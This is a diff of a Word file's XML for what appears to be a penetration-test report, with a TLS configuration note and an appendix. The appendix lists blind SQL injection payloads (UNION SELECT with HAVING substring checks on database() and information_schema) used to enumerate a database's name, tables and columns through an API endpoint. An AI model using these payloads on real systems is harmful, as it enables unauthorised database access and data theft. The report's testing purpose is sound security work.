+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>&lt;/VirtualHost&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">rusted SSL certificates can be gotten from </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId15" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>https://letsencrypt.org/</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">at no cost </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>[2]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8669,7 +9447,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71325133"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71393748"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8740,7 +9518,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71325134"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71393749"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8803,7 +9581,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71325135"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71393750"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8866,7 +9644,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71325136"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71393751"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8908,21 +9686,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t xml:space="preserve">: An attacker could do </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+              <w:t>: An attacker could do xyz with this vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8952,7 +9716,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71325137"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71393752"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9021,7 +9785,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71325138"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71393753"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9099,7 +9863,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71325139"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71393754"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9168,7 +9932,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71325140"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71393755"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9219,7 +9983,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71325141"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71393756"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -9256,7 +10020,7 @@
                     <pic:cNvPicPr preferRelativeResize="0"/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId16"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -9289,7 +10053,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71325142"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71393757"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -9311,7 +10075,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc71325143"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71393758"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -9376,7 +10140,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Each payload is placed at the end of the finding user API endpoint (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9572,27 +10336,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL --+</w:t>
+              <w:t>' union select NULL,NULL,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9705,27 +10449,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having</w:t>
+              <w:t>' union select NULL,NULL,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9768,27 +10492,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9806,21 +10510,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>) correctly.</w:t>
+              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10100,19 +10790,11 @@
               </w:rPr>
               <w:t xml:space="preserve">the value of </w:t>
             </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>), the current database name, to be “Secure”.</w:t>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>database(), the current database name, to be “Secure”.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10173,107 +10855,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10299,127 +10881,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10445,147 +10907,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10610,21 +10932,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10754,9 +11062,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10764,9 +11071,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>column_name</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10774,9 +11080,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10784,9 +11089,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>information_schema.columns where table_name='Users'</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10794,9 +11098,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve"> having substr(</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10804,9 +11107,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>column_name</w:t>
+            </w:r>
             <w:r>
